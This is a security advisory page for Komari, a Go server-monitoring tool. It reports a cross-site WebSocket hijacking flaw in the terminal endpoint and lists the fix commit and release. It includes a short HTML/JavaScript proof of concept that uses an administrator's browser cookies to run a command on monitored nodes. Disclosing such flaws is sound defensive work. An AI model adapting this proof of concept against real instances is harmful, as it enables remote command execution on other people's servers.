GHSA-q355-h244-969h
Suggest an improvement- Source
- https://github.com/advisories/GHSA-q355-h244-969h
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-q355-h244-969h/GHSA-q355-h244-969h.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-q355-h244-969h
- Aliases
- Published
- 2025-08-12T00:13:28Z
- Modified
- 2025-08-19T04:59:36.107083Z
- Severity
-
- 8.6 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Komari vulnerable to Cross-site WebSocket Hijacking
- Details
-
Summary
WebSocket upgrader has disabled origin checking, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks against authenticated users
Details
https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35
Any third party website can send requests to the terminal websocket endpoint with browser's cookies, resulting in remote code execution
PoC
- Login in to your komari instance
- Hosting the following HTML code on internet, replace
<komari-addr>and<target-uuid>into yours - Visit this HTML page, you can see your node is executing
uptimewithout your actions<pre></pre> <script> const socket = new WebSocket("wss://<komari-addr>/api/admin/client/<target-uuid>/terminal"); socket.addEventListener("open", (event) => { const binaryBlob = new Blob(['uptime\n'], { type: 'application/octet-stream' }); socket.send(binaryBlob); }); socket.addEventListener("message", (event) => { event.data.text().then(x => {document.querySelector("pre").append(x)}); }); </script>
Impact
An administrator of a Komari instance will execute commands on their nodes unnoticed when visiting a malware page.
- Database specific
{ "severity": "HIGH", "nvd_published_at": null, "github_reviewed_at": "2025-08-12T00:13:28Z", "cwe_ids": [ "CWE-1385" ], "github_reviewed": true }- References
-
- https://github.com/komari-monitor/komari/security/advisories/GHSA-q355-h244-969h
- https://github.com/komari-monitor/komari/commit/53171affcaf050145810efaaef420651a6e630be
- https://github.com/komari-monitor/komari
- https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35
- https://github.com/komari-monitor/komari/releases/tag/1.0.4-fix2
Affected packages
Go / github.com/komari-monitor/komari
Package
- Name
- github.com/komari-monitor/komari
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/komari-monitor/komari